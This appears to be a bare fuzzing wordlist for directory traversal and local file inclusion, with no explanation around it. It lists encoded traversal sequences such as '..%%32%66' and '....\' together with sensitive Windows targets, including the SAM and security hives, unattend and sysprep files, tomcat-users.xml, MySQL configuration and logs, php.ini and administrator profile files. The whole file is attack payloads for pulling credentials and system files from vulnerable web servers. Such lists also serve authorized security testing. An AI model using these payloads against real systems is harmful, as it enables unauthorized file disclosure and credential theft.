C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err
wp-login.php
C:/xampp/tomcat/conf/tomcat-users.xml
C:/windows/panther/unattended.xml
\xampp\tomcat\conf\web.xml
\xampp\tomcat\conf\tomcat-users.xml
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
C:/windows/explorer.exe
/....\....\....\....\....\....\....\
C:/xampp/tomcat/conf/web.xml
/./\/././\/././\/././\/././\/././\/././\/././\/./
\apache2\log\access_log
\log\error_log
\log\access.log
d:\System32\Inetsrv\metabase.xml
/..%%32%66..%%32%66..%%32%66..%%32%66
/....\
C:\xampp\tomcat\conf\web.xml
C:\xampp\tomcat\conf\tomcat-users.xml
c:\WINNT\php.ini
/..%%32%66..%%32%66..%%32%66
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
C:/xampp/webdav/webdav.txt
\log\access_log
\xampp\webdav\webdav.txt

C:/windows/panther/unattended.txt
/..........................................................................\
c:\NetServer\bin\stable\apache\php.ini
C:\WINNT\win.ini
C:/windows/panther/sysprep.xml
/..%%35%63
C:/windows/panther/unattend/unattend.xml
/./\/././\/././\/././\/././\/./
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
/./\/././\/././\/././\/././\/././\/././\/./
C:/windows/panther/unattend/unattend.txt
C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini
c:\inetpub\wwwroot\index.asp
C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err
C:/windows/notepad.exe
\logs\httpd\error_log
/....\....\....\
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
c:\AppServ\MySQL
/....\....\....\....\....\
C:\WINDOWS\win.ini
C:\WINDOWS\Repair\SAM
C:/unattend.xml
C:/windows/win.ini
/./\/././\/././\/././\/./
C:/windows/panther/unattend.xml
\log\httpd\access_log
c:\System32\Inetsrv\metabase.xml
C:/windows/repair/software
C:\WINDOWS\win.ini
C:/unattended.xml
C:/windows/panther/setupinfo.bak
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
.pass
c:\home\bin\stable\apache\php.ini
C:/users/administrator/ntuser.dat
C:/windows/repair/security
c:\WINDOWS\php.ini
C:/windows/temp/
C:/windows/panther/unattend/setupinfo
\apache2\log\access.log
C:/documents and settings/administrator/ntuser.dat
C:/sysprep/sysprep.inf
C:/winnt/win.ini
C:/windows/panther/unattend/sysprep.inf
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log
C:/MININT/SMSOSD/OSDLOGS/VARIABLES.DAT
C:/windows/csc/v2.0.6/pq
C:/documents and settings/administrator/desktop/desktop.ini
/..%%35%63..%%35%63
C:/documents and settings/administrator/ntuser.ini
/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/
\apache2\log\error.log
\log\httpd\error_log
C:/windows/panther/unattend/setupinfo.bak
/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63
/./\/./
C:/sysprep.inf
C:/unattended.txt
/....\....\
C:\xampp\webdav\webdav.txt
\log\error.log
C:/windows/panther/unattend/sysprep.xml
C:/unattend.txt
C:/windows/panther/sysprep.inf
/..%%32%66
/....\....\....\....\
C:\WINDOWS\win.ini
/.\/\.\
C:/windows/panther/unattend/unattended.txt
C:/users/administrator/ntuser.ini
C:/windows/panther/unattend.txt
/....\....\....\....\....\....\....\....\
C:/windows/panther/unattend/unattended.xml
/./\/././\/./
\apache2\log\error_log
C:/windows/csc/v2.0.6/sm
/./\/././\/././\/././\/././\/././\/./
C:/sysprep/sysprep.xml
C:/windows/panther/setupinfo
/..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66
c:\home2\bin\stable\apache\php.ini
\logs\httpd\access_log
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log
C:/windows/repair/sam
/..%%32%66..%%32%66
/....\....\....\....\....\....\
C:/users/administrator/desktop/desktop.ini
/..%%35%63..%%35%63..%%35%63..%%35%63
C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf
C:/sysprep.xml